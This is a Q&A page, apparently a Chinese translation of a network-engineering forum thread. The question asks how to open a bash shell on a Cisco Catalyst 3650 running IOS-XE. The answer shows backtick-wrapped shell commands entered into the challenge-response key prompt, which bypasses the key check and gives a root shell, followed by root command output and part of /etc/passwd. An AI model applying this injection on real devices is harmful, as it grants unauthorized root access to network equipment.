IOS-XE:请求系统shell漏洞

网络工程 思科 cisco催化剂 思科-ios 安全
2021-07-15 02:47:19 
Catalyst-3650#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 94d5c01766c7a0a29c8c59fec3ab992[..]
Please enter the shell access response based on the
above challenge (Press "Enter" when done or to quit.):
/bin/sh
Key verification failed

我记得可以通过输入诸如 '/bin/sh' 之类的小东西来进入 shell。我确定这不是梦,但我清楚地记得我没有把它写下来,因为我就是那样愚蠢..

那么我如何从 Cisco Catalyst 3650 上的 IOS-XE 进入 bash?

Switch Ports Model              SW Version        SW Image              Mode
------ ----- -----              ----------        ----------            ----
*    1 28    WS-C3650-24PS      03.03.03SE        cat3k_caa-universalk9 INSTALL
1个回答
Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: 438e1fd36da9cfdb61e655353a48bb9cf69f274ab2d2[..]
Please enter the shell access response based on the above challenge 
(Press "Enter" when done or to quit.):
`/bin/sh`
sh-3.2# uname -a
sh-3.2#
sh-3.2# uname -2323
uname: invalid option -- '2'
Try `uname --help' for more information.
#AHA SO WE HAVE STDERR, but not STDOUT..
sh-3.2# ls
sh-3.2# pwd
sh-3.2# whoami
sh-3.2# exit
exit
Key verification failed

那好吧,我们再去一次。

Switch#request system shell
Activity within this shell can jeopardize the functioning of the system.
Are you sure you want to continue? [y/n] y
Challenge: b577ea00feb8c833d725a85c6c53e1839ab9[..]
Please enter the shell access response based on the above challenge
(Press "Enter" when done or to quit.):
`bash 1>&2`
bash-3.2# uname -a
Linux localhost 2.6.32.59-cavium-octeon2.cge-cavium-octeon #1 SMP PREEMPT Fri May 10 11:48:14 PDT 2013 mips64 GNU/Linux
bash-3.2# ls
BinOS       config     hugepages  lic0        rommon_to_env  sys     webui
RP_0_0_cli  crashinfo  include    lic1        root           tftp
auto        dev        install    lkern_init  sbin           tmp
bin         drec0      isan       misc        selinux        ucode0
bsn         epc        issu       mnt         share          usr
chasfs      etc        lib        obfl0       space          var
common      flash      lib32      proc        spi            vol
bash-3.2# whoami
root
bash-3.2# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
binos:x:85:85:binos administrative user:/usr/binos/conf:/usr/binos/conf/bshell.sh
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
[..]
其它你可能感兴趣的问题
上一篇思科 IOS | 我可以在不同的加密映射中使用相同的转换集吗? 下一篇如何在 CISCO Meraki Z1 上配置 Internet 端口和公共 IP 设置?